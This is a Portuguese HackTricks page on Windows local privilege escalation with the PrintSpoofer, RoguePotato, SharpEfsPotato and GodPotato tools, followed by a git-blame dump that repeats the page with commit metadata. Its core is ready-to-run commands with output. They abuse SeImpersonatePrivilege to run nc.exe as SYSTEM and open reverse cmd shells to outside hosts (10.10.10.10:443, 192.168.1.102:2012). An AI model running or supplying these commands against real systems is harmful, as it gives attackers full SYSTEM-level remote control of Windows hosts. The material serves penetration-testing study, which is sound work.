hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.

</details>
{% endhint %}

### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) é um motor de busca alimentado pela **dark-web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.

O principal objetivo do WhiteIntel é combater a tomada de contas e ataques de ransomware resultantes de malware que rouba informações.

Você pode conferir o site deles e experimentar o motor gratuitamente em:

{% embed url="https://whiteintel.io" %}

***

{% hint style="warning" %}
**JuicyPotato não funciona** no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) podem ser usados para **aproveitar os mesmos privilégios e obter acesso ao nível `NT AUTHORITY\SYSTEM`**. Este [post no blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) aprofunda-se na ferramenta `PrintSpoofer`, que pode ser usada para abusar de privilégios de impersonação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
{% endhint %}

## Demonstração Rápida

### PrintSpoofer
```bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

```
### RoguePotato

{% code overflow="wrap" %}
```bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
{% endcode %}

### SharpEfsPotato
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system
```
### GodPotato
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
## Referências

* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)

### [WhiteIntel](https://whiteintel.io)

<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>

[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark-web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.

O objetivo principal do WhiteIntel é combater a tomada de contas e ataques de ransomware resultantes de malware que rouba informações.

Você pode verificar o site deles e experimentar o mecanismo **gratuitamente** em:

{% embed url="https://whiteintel.io" %}

{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
{% endhint %}
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			`# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`<details>`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`<summary>Support HackTricks</summary>`
Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para o [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`{% endhint %}`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-04-18 03:59:16 +00:00			`### [WhiteIntel](https://whiteintel.io)`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:04:08 +00:00			`<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`[WhiteIntel](https://whiteintel.io) é um motor de busca alimentado pela dark-web que oferece funcionalidades gratuitas para verificar se uma empresa ou seus clientes foram comprometidos por malwares ladrões.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`O principal objetivo do WhiteIntel é combater a tomada de contas e ataques de ransomware resultantes de malware que rouba informações.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`Você pode conferir o site deles e experimentar o motor gratuitamente em:`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
			`{% embed url="https://whiteintel.io" %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:04:08 +00:00			`***`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`{% hint style="warning" %}`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			JuicyPotato não funciona no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, [PrintSpoofer](https://github.com/itm4n/PrintSpoofer), [RoguePotato](https://github.com/antonioCoco/RoguePotato), [SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato), [GodPotato](https://github.com/BeichenDream/GodPotato) podem ser usados para aproveitar os mesmos privilégios e obter acesso ao nível `NT AUTHORITY\SYSTEM`. Este [post no blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) aprofunda-se na ferramenta `PrintSpoofer`, que pode ser usada para abusar de privilégios de impersonação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais.
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`{% endhint %}`

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-04-18 03:59:16 +00:00			`## Demonstração Rápida`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`### PrintSpoofer`
			```bash
			`c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"`

Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`--------------------------------------------------------------------------------`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`[+] Found privilege: SeImpersonatePrivilege`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`[+] Named pipe listening...`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`[+] CreateProcessAsUser() OK`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`NULL`

			```
			`### RoguePotato`

Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`{% code overflow="wrap" %}`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			```bash
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999`
			`# In some old versions you need to use the "-f" param`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00			`c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999`
			```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			`{% endcode %}`

GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00			`### SharpEfsPotato`
			```
			`SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami \| Set-Content C:\temp\w.log"`
			`SharpEfsPotato by @bugch3ck`
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`Local privilege escalation from SeImpersonatePrivilege using EfsRpc.`
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00
Translated ['windows-hardening/windows-local-privilege-escalation/roguep 2023-11-05 22:41:27 +00:00			`Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.`
GitBook: [#3612] No subject 2022-10-22 12:26:54 +00:00
			`[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2`
			`df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:`
			`[x]RpcBindingSetAuthInfo failed with status 0x6d3`
			`[+] Server connected to our evil RPC pipe`
			`[+] Duplicated impersonation token ready for process creation`
			`[+] Intercepted and authenticated successfully, launching program`
			`[+] Process created, enjoy!`

			`C:\temp>type C:\temp\w.log`
			`nt authority\system`
			```
GITBOOK-3874: change request with no subject merged in GitBook 2023-04-13 22:25:26 +00:00			`### GodPotato`
			```
			`GodPotato -cmd "cmd /c whoami"`
			`GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"`
			```
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			`## Referências`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:04:08 +00:00
Translated ['blockchain/blockchain-and-crypto-currencies/README.md', 'ge 2024-02-08 03:54:17 +00:00			`* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)`
			`* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)`
			`* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)`
			`* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)`
			`* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)`

Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. 2024-04-18 03:59:16 +00:00			`### [WhiteIntel](https://whiteintel.io)`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:04:08 +00:00			`<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`[WhiteIntel](https://whiteintel.io) é um mecanismo de busca alimentado pela dark-web que oferece funcionalidades gratuitas para verificar se uma empresa ou seus clientes foram comprometidos por malwares ladrões.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`O objetivo principal do WhiteIntel é combater a tomada de contas e ataques de ransomware resultantes de malware que rouba informações.`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:`
Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:33 +00:00
			`{% embed url="https://whiteintel.io" %}`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`{% hint style="success" %}`
			`Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`<details>`
Translated ['windows-hardening/active-directory-methodology/README.md', 2024-01-02 21:38:50 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`<summary>Support HackTricks</summary>`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`* Confira os [planos de assinatura](https://github.com/sponsors/carlospolop)!`
			`* Junte-se ao 💬 [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe truques de hacking enviando PRs para os repositórios do [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3541] No subject 2022-10-03 18:16:17 +00:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:04:21 +00:00			`{% endhint %}`